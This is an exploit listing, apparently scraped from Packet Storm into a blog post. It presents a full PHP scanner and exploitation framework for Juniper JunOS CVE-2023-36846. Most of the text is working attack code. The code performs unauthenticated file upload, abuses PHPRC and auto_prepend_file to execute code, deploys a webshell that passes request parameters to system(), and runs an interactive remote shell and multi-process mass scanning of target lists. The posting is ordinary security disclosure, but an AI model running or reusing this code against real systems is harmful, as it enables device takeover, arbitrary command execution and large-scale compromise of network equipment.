{“lastseen”:”2026-01-26T18:14:52″,”description”:”This PHP script is a modular scanner and exploitation framework targeting Juniper JunOS CVE\u20112023\u201136846, an arbitrary file upload vulnerability due to missing authentication.. It is designed with a clear separation of responsibilities and supports…”,”published”:”2026-01-26T00:00:00″,”modified”:”2026-01-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Juniper JunOS 23.4 Module Scanner \/ Exploitation Framework”,”source”:””,”references”:””,”id”:”PACKETSTORM:214349″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2023-36846″],”sourceData”:”=============================================================================================================================================\\n | # Title : Juniper Junos OS 23.4 Modular Scanner \\u0026 Exploitation Framework |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/support.juniper.net\/support\/eol\/software\/junos\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213671\/ \\u0026 CVE-2023-36846\\n \\n [+] Summary : This PHP script is a modular scanner and exploitation framework targeting Juniper JunOS CVE\u20112023\u201136846. \\n It is designed with a clear separation of responsibilities and supports single\u2011target testing, interactive exploitation, and large\u2011scale batch scanning.\\n \\n [+] Key Components \\u0026 Flow :\\n \\n Utilities (Utils)\\n \\n Helpers for screen clearing, URL normalization, and parsing target lists from files.\\n \\n HTTP Client (HttpClient)\\n A reusable cURL wrapper with configurable timeouts, SSL verification, redirects, headers, and POST\/GET handling.\\n \\n [+] Vulnerability Scanner (JunOSVulnerabilityScanner) :\\n \\n Detects whether the vulnerable endpoint (webauth_operation.php) is accessible.\\n \\n Attempts controlled file uploads using multiple size heuristics.\\n \\n Uploads a PHP test payload and an INI file to trigger execution via PHPRC.\\n \\n Verifies vulnerability by checking for unique execution markers.\\n \\n Performs cleanup after testing.\\n \\n [+] Exploitation Module (JunOSExploiter) :\\n \\n Deploys a functional webshell using the same upload\/INI mechanism.\\n \\n Executes arbitrary commands through the webshell and captures output.\\n \\n Supports automated cleanup of deployed artifacts.\\n \\n [+] PoC : \\n \\n # Quick Scan\\n `php junos_exploit.php -u https:\/\/target.com -r -v`\\n \\n # Interactive Shell\\n `php junos_exploit.php -u https:\/\/target.com -v`\\n \\n # Bulk Scan\\n `php junos_exploit.php -f targets.txt -t 10 -o results.txt`\\n \\n # Secure Scan (with SSL)\\n `php junos_exploit.php -f targets.txt -s -v`\\n \\n \\n \\u003c?php\\n \\n \\n class Utils {\\n public static function clearScreen() {\\n if (strtoupper(substr(PHP_OS, 0, 3)) === ‘WIN’) {\\n system(‘cls’);\\n } else {\\n system(‘clear’);\\n }\\n }\\n \\n public static function parseUrlsFile($filename) {\\n $urls = [];\\n if (!file_exists($filename)) {\\n throw new Exception(\\”File not found: {$filename}\\”);\\n }\\n \\n $lines = file($filename, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n foreach ($lines as $line) {\\n $line = trim($line);\\n if (!empty($line) \\u0026\\u0026 filter_var($line, FILTER_VALIDATE_URL)) {\\n $urls[] = $line;\\n }\\n }\\n \\n return $urls;\\n }\\n \\n public static function normalizeUrl($url) {\\n $url = rtrim($url, ‘\/’);\\n if (!preg_match(‘#^https?:\/\/#’, $url)) {\\n $url = ‘https:\/\/’ . $url;\\n }\\n return $url;\\n }\\n }\\n \\n class HttpClient {\\n private $verifySSL = false;\\n private $timeout = 15;\\n private $userAgent = ‘Mozilla\/5.0 (compatible; JunOS-Scanner\/1.0)’;\\n \\n public function __construct($options = []) {\\n $this-\\u003everifySSL = $options[‘verify_ssl’] ?? false;\\n $this-\\u003etimeout = $options[‘timeout’] ?? 15;\\n }\\n \\n public function setVerifySSL($verify) {\\n $this-\\u003everifySSL = $verify;\\n }\\n \\n public function request($url, $method = ‘GET’, $data = null, $headers = []) {\\n $ch = curl_init();\\n \\n $curlOptions = [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_FOLLOWLOCATION =\\u003e true,\\n CURLOPT_MAXREDIRS =\\u003e 3,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_CONNECTTIMEOUT =\\u003e 5,\\n CURLOPT_USERAGENT =\\u003e $this-\\u003euserAgent,\\n CURLOPT_SSL_VERIFYPEER =\\u003e $this-\\u003everifySSL,\\n CURLOPT_SSL_VERIFYHOST =\\u003e $this-\\u003everifySSL ? 2 : 0,\\n ];\\n \\n $defaultHeaders = [];\\n if (!isset($headers[‘Content-Type’]) \\u0026\\u0026 $method === ‘POST’) {\\n $defaultHeaders[] = ‘Content-Type: application\/x-www-form-urlencoded’;\\n }\\n \\n $allHeaders = array_merge($defaultHeaders, $headers);\\n if (!empty($allHeaders)) {\\n $curlOptions[CURLOPT_HTTPHEADER] = $allHeaders;\\n }\\n \\n if ($method === ‘POST’) {\\n $curlOptions[CURLOPT_POST] = true;\\n if ($data !== null) {\\n if (is_array($data)) {\\n $curlOptions[CURLOPT_POSTFIELDS] = http_build_query($data);\\n } else {\\n $curlOptions[CURLOPT_POSTFIELDS] = $data;\\n }\\n }\\n }\\n \\n curl_setopt_array($ch, $curlOptions);\\n \\n $response = curl_exec($ch);\\n $info = curl_getinfo($ch);\\n $error = curl_error($ch);\\n $errno = curl_errno($ch);\\n \\n curl_close($ch);\\n \\n return [\\n ‘success’ =\\u003e $errno === 0,\\n ‘response’ =\\u003e $response,\\n ‘http_code’ =\\u003e $info[‘http_code’] ?? 0,\\n ‘error’ =\\u003e $error,\\n ‘errno’ =\\u003e $errno,\\n ‘info’ =\\u003e $info,\\n ];\\n }\\n }\\n \\n class JunOSVulnerabilityScanner {\\n private $httpClient;\\n private $baseUrl;\\n private $verbose;\\n private $randomPrefix;\\n \\n public function __construct($baseUrl, $verbose = false, $verifySSL = false) {\\n $this-\\u003ebaseUrl = Utils::normalizeUrl($baseUrl);\\n $this-\\u003everbose = $verbose;\\n $this-\\u003erandomPrefix = ‘wt_’ . bin2hex(random_bytes(4));\\n $this-\\u003ehttpClient = new HttpClient([‘verify_ssl’ =\\u003e $verifySSL]);\\n \\n if ($verbose) {\\n echo \\”[DEBUG] Scanner initialized for: {$this-\\u003ebaseUrl}\\\\n\\”;\\n echo \\”[DEBUG] Random prefix: {$this-\\u003erandomPrefix}\\\\n\\”;\\n }\\n }\\n \\n public function testUploadEndpoint() {\\n $url = $this-\\u003ebaseUrl . \\”\/webauth_operation.php\\”;\\n $response = $this-\\u003ehttpClient-\\u003erequest($url);\\n \\n if ($response[‘http_code’] === 404 || $response[‘http_code’] === 403) {\\n return false;\\n }\\n \\n \\n $testData = [‘rs’ =\\u003e ‘test’];\\n $response = $this-\\u003ehttpClient-\\u003erequest($url, ‘POST’, $testData);\\n \\n return $response[‘http_code’] === 200;\\n }\\n \\n private function attemptUpload($payload, $filename, $mimeType = ‘text\/html’) {\\n $uploadUrl = $this-\\u003ebaseUrl . \\”\/webauth_operation.php\\”;\\n \\n $sizeAttempts = [\\n strlen(base64_encode($payload)), \\n strlen($payload), \\n strlen(base64_encode($payload)) * 2, \\n ];\\n \\n foreach ($sizeAttempts as $csize) {\\n $b64Payload = base64_encode($payload);\\n $fileData = \\”data:{$mimeType};base64,{$b64Payload}\\”;\\n \\n $postData = [\\n ‘rs’ =\\u003e ‘do_upload’,\\n ‘rsargs[0]’ =\\u003e \\”[{\\\\\\”fileData\\\\\\”:\\\\\\”{$fileData}\\\\\\”,\\\\\\”fileName\\\\\\”:\\\\\\”{$filename}\\\\\\”,\\\\\\”csize\\\\\\”:{$csize}}]\\”\\n ];\\n \\n if ($this-\\u003everbose) {\\n echo \\”[DEBUG] Attempting upload with csize={$csize}\\\\n\\”;\\n }\\n \\n $response = $this-\\u003ehttpClient-\\u003erequest($uploadUrl, ‘POST’, $postData);\\n \\n if (!$response[‘success’] || $response[‘http_code’] !== 200) {\\n continue;\\n }\\n \\n $patterns = [\\n ‘\/0:\\\\s*\\\\'([^\\\\’]+)\\\\’\\\\s*\\\\},\/’,\\n ‘\/\\”0\\”:\\”([^\\”]+)\\”\/’,\\n ‘\/\\\\’0\\\\’:\\\\'([^\\\\’]+)\\\\’\/’,\\n ‘\/filename[\\”\\\\’]?\\\\s*:\\\\s*[\\”\\\\’]?([^\\”\\\\’\\\\s,]+)\/i’,\\n ];\\n \\n foreach ($patterns as $pattern) {\\n if (preg_match($pattern, $response[‘response’], $matches)) {\\n $uploadedFile = $matches[1];\\n \\n if (strpos($uploadedFile, ‘..’) !== false || strpos($uploadedFile, ‘\/’) !== false) {\\n continue;\\n }\\n \\n if ($this-\\u003everbose) {\\n echo \\”[DEBUG] Extracted filename: {$uploadedFile}\\\\n\\”;\\n }\\n \\n return $uploadedFile;\\n }\\n }\\n \\n if (strpos($response[‘response’], ‘fileName’) !== false) {\\n \\n $jsonMatch = [];\\n if (preg_match(‘\/\\\\{\\”?0\\”?:\\\\s*\\”([^\\”]+)\\”\\\\}\/’, $response[‘response’], $jsonMatch)) {\\n return $jsonMatch[1];\\n }\\n }\\n }\\n \\n return null;\\n }\\n \\n public function testVulnerability() {\\n if ($this-\\u003everbose) {\\n echo \\”[*] Testing vulnerability for: {$this-\\u003ebaseUrl}\\\\n\\”;\\n }\\n \\n if (!$this-\\u003etestUploadEndpoint()) {\\n if ($this-\\u003everbose) {\\n echo \\”[-] Upload endpoint not accessible\\\\n\\”;\\n }\\n return false;\\n }\\n \\n $uniqueToken = $this-\\u003erandomPrefix . ‘_test_’ . bin2hex(random_bytes(4));\\n $phpPayload = \\”\\u003c?php echo ‘[S]’ . ‘{$uniqueToken}’ . ‘[E]’; ?\\u003e\\”;\\n \\n $phpFile = $this-\\u003eattemptUpload($phpPayload, $this-\\u003erandomPrefix . ‘.php’);\\n \\n if ($phpFile === null) {\\n if ($this-\\u003everbose) {\\n echo \\”[-] PHP upload failed\\\\n\\”;\\n }\\n return false;\\n }\\n \\n \\n $iniPayload = ‘auto_prepend_file=\\”\/var\/tmp\/’ . $phpFile . ‘\\”‘;\\n $iniFile = $this-\\u003eattemptUpload($iniPayload, $this-\\u003erandomPrefix . ‘.ini’, ‘text\/plain’);\\n \\n if ($iniFile === null) {\\n \\n $this-\\u003eattemptCleanup($phpFile, null);\\n if ($this-\\u003everbose) {\\n echo \\”[-] INI upload failed\\\\n\\”;\\n }\\n return false;\\n }\\n \\n \\n $testUrl = $this-\\u003ebaseUrl . \\”\/webauth_operation.php?PHPRC=\/var\/tmp\/{$iniFile}\\”;\\n $response = $this-\\u003ehttpClient-\\u003erequest($testUrl);\\n \\n $isVulnerable = false;\\n $cleanupFiles = [‘php’ =\\u003e $phpFile, ‘ini’ =\\u003e $iniFile];\\n \\n \\n if (strpos($response[‘response’], $uniqueToken) !== false) {\\n $isVulnerable = true;\\n } else {\\n \\n $cmdTestUrl = $testUrl . \\”\\u00260=echo+\\” . urlencode($uniqueToken);\\n $cmdResponse = $this-\\u003ehttpClient-\\u003erequest($cmdTestUrl);\\n \\n if (strpos($cmdResponse[‘response’], $uniqueToken) !== false) {\\n $isVulnerable = true;\\n } else {\\n \\n if (preg_match(‘\/\\\\[S\\\\](.*?)\\\\[E\\\\]\/s’, $cmdResponse[‘response’], $matches)) {\\n if (strpos($matches[1], $uniqueToken) !== false) {\\n $isVulnerable = true;\\n }\\n }\\n }\\n }\\n \\n $this-\\u003eattemptCleanup($phpFile, $iniFile);\\n \\n return $isVulnerable;\\n }\\n \\n private function attemptCleanup($phpFile, $iniFile) {\\n \\n if ($phpFile) {\\n $cleanupUrl = $this-\\u003ebaseUrl . \\”\/webauth_operation.php?PHPRC=\/var\/tmp\/{$iniFile}\\u0026delete=1\\”;\\n $this-\\u003ehttpClient-\\u003erequest($cleanupUrl);\\n }\\n \\n \\n if ($iniFile) {\\n \\n $emptyIni = ”;\\n $this-\\u003eattemptUpload($emptyIni, $iniFile, ‘text\/plain’);\\n }\\n }\\n \\n public function getExploitInstance() {\\n return new JunOSExploiter($this-\\u003ebaseUrl, $this-\\u003everbose, $this-\\u003ehttpClient, $this-\\u003erandomPrefix);\\n }\\n }\\n \\n class JunOSExploiter {\\n private $baseUrl;\\n private $httpClient;\\n private $verbose;\\n private $randomPrefix;\\n private $uploadedFiles = [];\\n \\n public function __construct($baseUrl, $verbose, $httpClient, $randomPrefix) {\\n $this-\\u003ebaseUrl = $baseUrl;\\n $this-\\u003ehttpClient = $httpClient;\\n $this-\\u003everbose = $verbose;\\n $this-\\u003erandomPrefix = $randomPrefix;\\n }\\n \\n public function deployWebshell() {\\n $phpFilename = $this-\\u003erandomPrefix . ‘_shell.php’;\\n $iniFilename = $this-\\u003erandomPrefix . ‘_config.ini’;\\n \\n \\n $phpPayload = \\u003c\\u003c\\u003c’PHP’\\n \\u003c?php\\n if(isset($_GET[‘cleanup’])) {\\n @unlink(__FILE__);\\n if(isset($_GET[‘ini’])) {\\n $iniFile = ‘\/var\/tmp\/’ . basename($_GET[‘ini’]);\\n @unlink($iniFile);\\n }\\n exit;\\n }\\n if(isset($_GET[‘cmd’])) {\\n echo ‘[S]’;\\n system($_GET[‘cmd’]);\\n echo ‘[E]’;\\n }\\n ?\\u003e\\n PHP;\\n \\n $scanner = new JunOSVulnerabilityScanner($this-\\u003ebaseUrl, $this-\\u003everbose);\\n \\n $phpFile = $scanner-\\u003eattemptUpload($phpPayload, $phpFilename);\\n if (!$phpFile) {\\n throw new Exception(\\”Failed to upload PHP webshell\\”);\\n }\\n \\n $iniPayload = ‘auto_prepend_file=\\”\/var\/tmp\/’ . $phpFile . ‘\\”‘;\\n $iniFile = $scanner-\\u003eattemptUpload($iniPayload, $iniFilename, ‘text\/plain’);\\n \\n if (!$iniFile) {\\n throw new Exception(\\”Failed to upload INI configuration\\”);\\n }\\n \\n $this-\\u003euploadedFiles = [\\n ‘php’ =\\u003e $phpFile,\\n ‘ini’ =\\u003e $iniFile,\\n ‘shell_url’ =\\u003e $this-\\u003ebaseUrl . \\”\/webauth_operation.php?PHPRC=\/var\/tmp\/{$iniFile}\\”\\n ];\\n \\n $testUrl = $this-\\u003euploadedFiles[‘shell_url’] . \\”\\u0026cmd=whoami\\”;\\n $testResponse = $this-\\u003ehttpClient-\\u003erequest($testUrl);\\n \\n if (!preg_match(‘\/\\\\[S\\\\].*\\\\[E\\\\]\/s’, $testResponse[‘response’])) {\\n $this-\\u003ecleanup();\\n throw new Exception(\\”Webshell deployed but not functional\\”);\\n }\\n \\n return $this-\\u003euploadedFiles;\\n }\\n \\n public function executeCommand($command) {\\n if (empty($this-\\u003euploadedFiles)) {\\n throw new Exception(\\”Webshell not deployed\\”);\\n }\\n \\n $url = $this-\\u003euploadedFiles[‘shell_url’] . \\”\\u0026cmd=\\” . urlencode($command);\\n $response = $this-\\u003ehttpClient-\\u003erequest($url);\\n \\n if (preg_match(‘\/\\\\[S\\\\](.*?)\\\\[E\\\\]\/s’, $response[‘response’], $matches)) {\\n return trim($matches[1]);\\n }\\n \\n return $response[‘response’];\\n }\\n \\n public function cleanup() {\\n if (empty($this-\\u003euploadedFiles)) {\\n return false;\\n }\\n \\n $cleanupUrl = $this-\\u003ebaseUrl . \\”\/webauth_operation.php?PHPRC=\/var\/tmp\/{$this-\\u003euploadedFiles[‘ini’]}\\u0026cleanup=1\\u0026ini={$this-\\u003euploadedFiles[‘ini’]}\\”;\\n $this-\\u003ehttpClient-\\u003erequest($cleanupUrl);\\n \\n $this-\\u003euploadedFiles = [];\\n return true;\\n }\\n \\n public function __destruct() {\\n $this-\\u003ecleanup();\\n }\\n }\\n \\n class InteractiveShell {\\n private $exploiter;\\n private $isWindows;\\n \\n public function __construct($exploiter) {\\n $this-\\u003eexploiter = $exploiter;\\n $this-\\u003eisWindows = strtoupper(substr(PHP_OS, 0, 3)) === ‘WIN’;\\n }\\n \\n public function run() {\\n echo \\”\\\\n\\” . str_repeat(\\”=\\”, 60) . \\”\\\\n\\”;\\n echo \\”JunOS Interactive Shell\\\\n\\”;\\n echo \\”Type ‘exit’ or ‘quit’ to leave (auto-cleanup enabled)\\\\n\\”;\\n echo \\”Type ‘clear’ to clear screen\\\\n\\”;\\n echo \\”Type ‘help’ for commands\\\\n\\”;\\n echo str_repeat(\\”=\\”, 60) . \\”\\\\n\\\\n\\”;\\n \\n \\n $stdin = fopen(‘php:\/\/stdin’, ‘r’);\\n \\n while (true) {\\n echo \\”junos\\u003e \\”;\\n $command = trim(fgets($stdin));\\n \\n if (empty($command)) {\\n continue;\\n }\\n \\n $cmdLower = strtolower($command);\\n \\n if (in_array($cmdLower, [‘exit’, ‘quit’])) {\\n echo \\”[*] Exiting and cleaning up…\\\\n\\”;\\n break;\\n } elseif ($cmdLower === ‘clear’) {\\n Utils::clearScreen();\\n continue;\\n } elseif ($cmdLower === ‘help’) {\\n $this-\\u003eshowHelp();\\n continue;\\n } elseif ($cmdLower === ‘pwd’) {\\n \\n $command = ‘pwd’;\\n }\\n \\n try {\\n $result = $this-\\u003eexploiter-\\u003eexecuteCommand($command);\\n echo \\”[+] Result:\\\\n\\” . $result . \\”\\\\n\\”;\\n } catch (Exception $e) {\\n echo \\”[!] Error: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n }\\n \\n fclose($stdin);\\n }\\n \\n private function showHelp() {\\n echo \\”\\\\nAvailable commands:\\\\n\\”;\\n echo \\” exit, quit – Exit shell and cleanup\\\\n\\”;\\n echo \\” clear – Clear screen\\\\n\\”;\\n echo \\” help – Show this help\\\\n\\”;\\n echo \\” whoami – Check current user\\\\n\\”;\\n echo \\” pwd – Print working directory\\\\n\\”;\\n echo \\” id – Show user\/group IDs\\\\n\\”;\\n echo \\” ls [dir] – List directory\\\\n\\”;\\n echo \\” cat \\u003cfile\\u003e – View file\\\\n\\”;\\n echo \\” uname -a – System info\\\\n\\”;\\n echo \\”\\\\n\\”;\\n }\\n }\\n \\n class BatchScanner {\\n private $threads;\\n private $outputFile;\\n private $verbose;\\n private $verifySSL;\\n \\n public function __construct($threads = 5, $outputFile = null, $verbose = false, $verifySSL = false) {\\n $this-\\u003ethreads = max(1, min($threads, 50));\\n $this-\\u003eoutputFile = $outputFile;\\n $this-\\u003everbose = $verbose;\\n $this-\\u003everifySSL = $verifySSL;\\n }\\n \\n public function scanUrls($urls) {\\n $total = count($urls);\\n $vulnerable = 0;\\n $results = [];\\n \\n echo \\”[*] Starting batch scan with {$this-\\u003ethreads} threads\\\\n\\”;\\n echo \\”[*] Targets: {$total}\\\\n\\”;\\n echo \\”[*] SSL Verification: \\” . ($this-\\u003everifySSL ? \\”ON\\” : \\”OFF\\”) . \\”\\\\n\\”;\\n echo str_repeat(\\”-\\”, 60) . \\”\\\\n\\”;\\n \\n \\n $chunks = array_chunk($urls, ceil($total \/ $this-\\u003ethreads));\\n $workers = [];\\n \\n foreach ($chunks as $chunkIndex =\\u003e $chunk) {\\n $pid = pcntl_fork();\\n \\n if ($pid == -1) {\\n \\n die(\\”Could not fork\\”);\\n } elseif ($pid) {\\n \/\/ Parent process\\n $workers[] = $pid;\\n } else {\\n \/\/ Child process\\n $childResults = [];\\n foreach ($chunk as $url) {\\n try {\\n $scanner = new JunOSVulnerabilityScanner($url, $this-\\u003everbose, $this-\\u003everifySSL);\\n $isVuln = $scanner-\\u003etestVulnerability();\\n \\n if ($isVuln) {\\n $childResults[] = $url;\\n echo \\”[+] {$url} – VULNERABLE (PID: \\” . getmypid() . \\”)\\\\n\\”;\\n } elseif ($this-\\u003everbose) {\\n echo \\”[-] {$url} – NOT vulnerable (PID: \\” . getmypid() . \\”)\\\\n\\”;\\n }\\n } catch (Exception $e) {\\n if ($this-\\u003everbose) {\\n echo \\”[!] {$url} – ERROR: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n }\\n }\\n \\n $resultFile = sys_get_temp_dir() . ‘\/junos_scan_’ . getmypid() . ‘.tmp’;\\n file_put_contents($resultFile, implode(\\”\\\\n\\”, $childResults));\\n exit(0);\\n }\\n }\\n \\n foreach ($workers as $pid) {\\n pcntl_waitpid($pid, $status);\\n \\n $resultFile = sys_get_temp_dir() . ‘\/junos_scan_’ . $pid . ‘.tmp’;\\n if (file_exists($resultFile)) {\\n $childUrls = file($resultFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n $results = array_merge($results, $childUrls);\\n unlink($resultFile);\\n }\\n }\\n \\n if (empty($workers)) {\\n \/\/ \u0645\u0639\u0627\u0644\u062c\u0629 \u0645\u062a\u0633\u0644\u0633\u0644\u0629\\n foreach ($urls as $url) {\\n try {\\n $scanner = new JunOSVulnerabilityScanner($url, $this-\\u003everbose, $this-\\u003everifySSL);\\n $isVuln = $scanner-\\u003etestVulnerability();\\n \\n if ($isVuln) {\\n $results[] = $url;\\n echo \\”[+] {$url} – VULNERABLE\\\\n\\”;\\n } elseif ($this-\\u003everbose) {\\n echo \\”[-] {$url} – NOT vulnerable\\\\n\\”;\\n }\\n } catch (Exception $e) {\\n if ($this-\\u003everbose) {\\n echo \\”[!] {$url} – ERROR: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n }\\n }\\n }\\n }\\n \\n if ($this-\\u003eoutputFile \\u0026\\u0026 !empty($results)) {\\n file_put_contents($this-\\u003eoutputFile, implode(\\”\\\\n\\”, $results) . \\”\\\\n\\”, LOCK_EX);\\n echo \\”[*] Results saved to: {$this-\\u003eoutputFile}\\\\n\\”;\\n }\\n \\n echo str_repeat(\\”-\\”, 60) . \\”\\\\n\\”;\\n echo \\”[*] Scan completed. Vulnerable: \\” . count($results) . \\”\/{$total}\\\\n\\”;\\n \\n return $results;\\n }\\n }\\n \\n function main() {\\n $options = getopt(\\”t:o:f:u:vsrh\\”, [\\n \\”threads:\\”, \\”output:\\”, \\”file:\\”, \\”url:\\”, \\n \\”verbose\\”, \\”ssl\\”, \\”report\\”, \\”help\\”\\n ]);\\n \\n \\n if (isset($options[‘h’]) || isset($options[‘help’])) {\\n showHelp();\\n exit(0);\\n }\\n \\n \\n $threads = isset($options[‘t’]) ? (int)$options[‘t’] : \\n (isset($options[‘threads’]) ? (int)$options[‘threads’] : 5);\\n $output = isset($options[‘o’]) ? $options[‘o’] : \\n (isset($options[‘output’]) ? $options[‘output’] : null);\\n $file = isset($options[‘f’]) ? $options[‘f’] : \\n (isset($options[‘file’]) ? $options[‘file’] : null);\\n $url = isset($options[‘u’]) ? $options[‘u’] : \\n (isset($options[‘url’]) ? $options[‘url’] : null);\\n $verbose = isset($options[‘v’]) || isset($options[‘verbose’]);\\n $verifySSL = isset($options[‘s’]) || isset($options[‘ssl’]);\\n $reportOnly = isset($options[‘r’]) || isset($options[‘report’]);\\n \\n \\n if ($url \\u0026\\u0026 $reportOnly) {\\n echo \\”[*] Quick vulnerability check for: {$url}\\\\n\\”;\\n $scanner = new JunOSVulnerabilityScanner($url, true, $verifySSL);\\n $isVuln = $scanner-\\u003etestVulnerability();\\n \\n if ($isVuln) {\\n echo \\”\\\\n[\u2713] TARGET IS VULNERABLE TO CVE-2023-36846\\\\n\\”;\\n exit(0);\\n } else {\\n echo \\”\\\\n[\u2717] Target is NOT vulnerable\\\\n\\”;\\n exit(1);\\n }\\n }\\n \\n \\n if ($url \\u0026\\u0026 !$reportOnly) {\\n echo \\”[*] Starting interactive mode for: {$url}\\\\n\\”;\\n \\n try {\\n \\n $scanner = new JunOSVulnerabilityScanner($url, true, $verifySSL);\\n if (!$scanner-\\u003etestVulnerability()) {\\n echo \\”[!] Target does not appear to be vulnerable\\\\n\\”;\\n echo \\”[?] Continue anyway? (y\/N): \\”;\\n $confirm = trim(fgets(STDIN));\\n if (strtolower($confirm) !== ‘y’) {\\n exit(1);\\n }\\n }\\n \\n $exploiter = $scanner-\\u003egetExploitInstance();\\n $files = $exploiter-\\u003edeployWebshell();\\n \\n echo \\”[+] Webshell deployed successfully\\\\n\\”;\\n echo \\”[+] PHP file: {$files[‘php’]}\\\\n\\”;\\n echo \\”[+] INI file: {$files[‘ini’]}\\\\n\\”;\\n echo \\”[+] Access URL: {$files[‘shell_url’]}\\\\n\\\\n\\”;\\n \\n $shell = new InteractiveShell($exploiter);\\n $shell-\\u003erun();\\n \\n } catch (Exception $e) {\\n echo \\”[!] Error: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n \\n exit(0);\\n }\\n \\n if ($file) {\\n try {\\n $urls = Utils::parseUrlsFile($file);\\n if (empty($urls)) {\\n echo \\”[!] No valid URLs found in file\\\\n\\”;\\n exit(1);\\n }\\n \\n $scanner = new BatchScanner($threads, $output, $verbose, $verifySSL);\\n $results = $scanner-\\u003escanUrls($urls);\\n \\n if (!empty($results)) {\\n echo \\”\\\\n[*] Vulnerable hosts found:\\\\n\\”;\\n foreach ($results as $vulnUrl) {\\n echo \\” – {$vulnUrl}\\\\n\\”;\\n }\\n }\\n \\n } catch (Exception $e) {\\n echo \\”[!] Error: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n \\n exit(0);\\n }\\n \\n echo \\”[!] Invalid arguments\\\\n\\”;\\n showHelp();\\n exit(1);\\n }\\n \\n function showHelp() {\\n echo \\u003c\\u003c\\u003cHELP\\n JunOS CVE-2023-36846 Scanner \\u0026 Exploit Framework by indoushka\\n =============================================================\\n \\n Usage modes:\\n php junos_exploit.php -u URL [OPTIONS] # Interactive shell\\n php junos_exploit.php -u URL -r # Quick vulnerability check\\n php junos_exploit.php -f FILE [OPTIONS] # Batch scan\\n \\n Options:\\n -u, –url URL Target URL (https:\/\/target.com)\\n -f, –file FILE File containing URLs (one per line)\\n -t, –threads N Threads for batch scan (1-50, default: 5)\\n -o, –output FILE Save vulnerable hosts to file\\n -v, –verbose Enable verbose output\\n -s, –ssl Enable SSL certificate verification\\n -r, –report Report only mode (no exploitation)\\n -h, –help Show this help\\n \\n Examples:\\n # Quick check\\n php junos_exploit.php -u https:\/\/192.168.1.1 -r -v\\n \\n # Interactive shell\\n php junos_exploit.php -u https:\/\/vuln-router.local -v\\n \\n # Batch scan\\n php junos_exploit.php -f targets.txt -t 10 -o vuln.txt -v\\n \\n # Batch scan with SSL verification\\n php junos_exploit.php -f targets.txt -s -o secure_scan.txt\\n \\n Security Notes:\\n \u2022 Use only on authorized systems\\n \u2022 SSL verification is disabled by default for testing\\n \u2022 Tool performs auto-cleanup after exploitation\\n \u2022 Random file names prevent collisions\\n \\n HELP;\\n }\\n \\n if (php_sapi_name() === ‘cli’) {\\n \\n $requiredExts = [‘curl’];\\n $missingExts = [];\\n \\n foreach ($requiredExts as $ext) {\\n if (!extension_loaded($ext)) {\\n $missingExts[] = $ext;\\n }\\n }\\n \\n if (!empty($missingExts)) {\\n echo \\”[!] Missing PHP extensions: \\” . implode(‘, ‘, $missingExts) . \\”\\\\n\\”;\\n echo \\”[!] Install with: sudo apt-get install php-curl\\\\n\\”;\\n exit(1);\\n }\\n \\n declare(ticks = 1);\\n pcntl_signal(SIGINT, function() {\\n echo \\”\\\\n[*] Interrupted by user. Exiting…\\\\n\\”;\\n exit(0);\\n });\\n \\n try {\\n main();\\n } catch (Exception $e) {\\n echo \\”[!] Fatal error: \\” . $e-\\u003egetMessage() . \\”\\\\n\\”;\\n exit(1);\\n }\\n } else {\\n header(‘HTTP\/1.1 403 Forbidden’);\\n echo \\”This tool must be run from command line\\\\n\\”;\\n exit(1);\\n }\\n \\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214349″,”cvss”:{“score”:5.3,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:N\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214349\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-26T18:14:52″,”description”:”This PHP script is a modular scanner and exploitation framework targeting Juniper JunOS CVE\u20112023\u201136846, an arbitrary file upload vulnerability due to missing authentication.. It is…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,22,12,21,13,53,7,11,5],"class_list":["post-37262","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-53","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n